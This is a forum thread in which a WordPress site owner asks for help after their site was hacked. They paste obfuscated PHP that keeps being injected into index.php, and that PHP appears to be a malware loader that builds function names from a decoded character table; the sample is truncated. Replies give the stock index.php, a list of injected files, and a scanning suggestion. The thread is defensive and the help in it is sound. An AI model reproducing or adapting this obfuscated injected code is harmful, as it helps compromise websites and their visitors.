# Wordpress site got hacked

Tags: wordpress

My Wordpress site is hacked and following code is bering added into index.php over and over - what should I do?

I have latest version of WP

```
<?php
$O_00__OO0O='BEGINJ6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O0OO_0_O0_='balanced4141989';
$O00_0_OOO_=665;
$O0_0__OO0O='rD-BC-G-/F';
$O_000O__OO=1871;
$O_0_0O_OO0=array("perfecti","albuminuria","crusie","hepatocolic","duchesnea","constrainingly","flashtester","astroscopus","anonang","flagellator","diene","microgaster","deceitfully","jerker","bisect","antispreader","burring","landocrat","coletit","aurir");;
$O_0O_O_0O0='facemaker.php';
$O__OO0_O00='T4';
$O_0O0O_0O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O_00_O_0OO=$O_0O0O_0O_{26}.$O_0O0O_0O_{6}.$O_0O0O_0O_{10}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{26}.$O_0O0O_0O_{30}.$O_0O0O_0O_{38}.$O_0O0O_0O_{6}.$O_0O0O_0O_{18}.$O_0O0O_0O_{23}.$O_0O0O_0O_{10}.$O_0O0O_0O_{29}.$O_0O0O_0O_{10}.$O_0O0O_0O_{12}.$O_0O0O_0O_{5}.$O_0O0O_0O_{30}.$O_0O0O_0O_{2}.$O_0O0O_0O_{35}.$O_0O0O_0O_{0}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{33}.$O_0O0O_0O_{30}.$O_0O0O_0O_{10};$O0OO0__0_O=$O_0O0O_0O_{16}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{27}.$O_0O0O_0O_{29}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{16}.$O_0O0O_0O_{23}.$O_0O0O_0O_{6}.$O_0O0O_0O_{32}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{32}.$O_0O0O_0O_{6}.$O_0O0O_0O_{23}.$O_0O0O_0O_{23}.$O_0O0O_0O_{3}.$O_0O0O_0O_{6}.$O_0O0O_0O_{32}.$O_0O0O_0O_{25};$O0_OOO00__=$O_0O0O_0O_{33}.$O_0O0O_0O_{10}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{6}.$O_0O0O_0O_{5}.$O_0O0O_0O_{29}.$O_0O0O_0O_{33}.$O_0O0O_0O_{35}.$O_0O0O_0O_{32}.$O_0O0O_0O_{25}.$O_0O0O_0O_{30}.$O_0O0O_0O_{10}.$O_0O0O_0O_{29}.$O_0O0O_0O_{32}.$O_0O0O_0O_{23}.$O_0O0O_0O_{12}.$O_0O0O_0O_{30}.$O_0O0O_0O_{0}.$O_0O0O_0O_{10};$O0OOO_0_0_=$O_0O0O_0O_{33}.$O_0O0O_0O_{10}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{6}.
```

Comment: Try to ask your question on [super user](https://superuser.com/)

Answer (score 0):

Normally index.php contain blew code in WordPress

```
<?php

define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
```

Do you have your back files? If you have then just replaced this index.php 
Also, you should add your site to [Google Webmaster](https://www.google.com/webmasters/#?modal_active=none). 
Many of the features of Google Webmaster Search Console can help you identify potential problems. Thank you.

Comment: I have got it fixed as some php files were added which were changing the index.php

wp-admin\includes\images.php

wp-admin\maint\content.php

wp-admin\maint\images.php

wp-content\plugins\redirection\modules\apache.php

wp-content\plugins\sfwd-lms\includes\class-ld-lms.php

wp-content\plugins\wp-super-cache\wp-cache-phase2.php

wp-includes\Requests\Transport\images.php

wp-includes\SimplePie\Net\images.php

Comment: @shahbazgemini you can also check malicious script using some online tools or website like https://sitecheck.sucuri.net/